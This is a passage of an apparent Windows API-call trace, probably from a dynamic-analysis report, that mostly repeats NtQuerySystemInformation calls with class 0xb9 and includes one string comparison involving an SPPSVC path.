ResultLength=0x0) [0238.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x50, ResultLength=0x0) [0238.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da80, Length=0x50, ResultLength=0x0) [0238.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da80, Length=0x50, ResultLength=0x0) [0238.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da80, Length=0x50, ResultLength=0x0) [0238.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da80, Length=0x50, ResultLength=0x0) [0238.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x38, ResultLength=0x0) [0238.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0238.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0238.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0238.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0238.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d850, Length=0x28, ResultLength=0x0) [0238.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x38, ResultLength=0x0) [0238.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8d0, Length=0x28, ResultLength=0x0) [0238.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8d0, Length=0x28, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d770, Length=0x20, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6f0, Length=0x20, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6f0, Length=0x20, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6f0, Length=0x20, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x38, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x38, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x20, ResultLength=0x0) [0238.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7c0, Length=0x20, ResultLength=0x0) [0238.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7c0, Length=0x20, ResultLength=0x0) [0238.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df70, Length=0x20, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x50, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x50, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x50, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbe0, Length=0x50, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbe0, Length=0x50, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbe0, Length=0x50, ResultLength=0x0) [0238.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbe0, Length=0x50, ResultLength=0x0) [0238.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db10, Length=0x38, ResultLength=0x0) [0238.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x28, ResultLength=0x0) [0238.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x28, ResultLength=0x0) [0238.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x28, ResultLength=0x0) [0238.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x28, ResultLength=0x0) [0238.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db10, Length=0x38, ResultLength=0x0) [0238.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x28, ResultLength=0x0) [0238.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x28, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db10, Length=0x38, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d910, Length=0x20, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d910, Length=0x20, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d910, Length=0x20, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db10, Length=0x38, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d920, Length=0x20, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d920, Length=0x20, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x50, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x50, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x50, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbe0, Length=0x50, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbe0, Length=0x50, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbe0, Length=0x50, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbe0, Length=0x50, ResultLength=0x0) [0238.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db10, Length=0x38, ResultLength=0x0) [0238.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x28, ResultLength=0x0) [0238.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x28, ResultLength=0x0) [0238.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x28, ResultLength=0x0) [0238.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x28, ResultLength=0x0) [0238.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db10, Length=0x38, ResultLength=0x0) [0238.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x28, ResultLength=0x0) [0238.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x28, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db10, Length=0x38, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d910, Length=0x20, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d910, Length=0x20, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d910, Length=0x20, ResultLength=0x0) [0238.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db10, Length=0x38, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d920, Length=0x20, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d920, Length=0x20, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dda0, Length=0x50, ResultLength=0x0) [0238.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd20, Length=0x28, ResultLength=0x0) [0238.247] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dda0, Length=0x50, ResultLength=0x0) [0238.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dda0, Length=0x50, ResultLength=0x0) [0238.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dda0, Length=0x50, ResultLength=0x0) [0238.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x38, ResultLength=0x0) [0238.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db00, Length=0x28, ResultLength=0x0) [0238.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db00, Length=0x28, ResultLength=0x0) [0238.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db00, Length=0x28, ResultLength=0x0) [0238.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db70, Length=0x28, ResultLength=0x0) [0238.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x38, ResultLength=0x0) [0238.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x28, ResultLength=0x0) [0238.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x28, ResultLength=0x0) [0238.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da90, Length=0x20, ResultLength=0x0) [0238.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x20, ResultLength=0x0) [0238.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x20, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x20, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x38, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x38, ResultLength=0x0) [0238.256] NtQuerySystemInformation 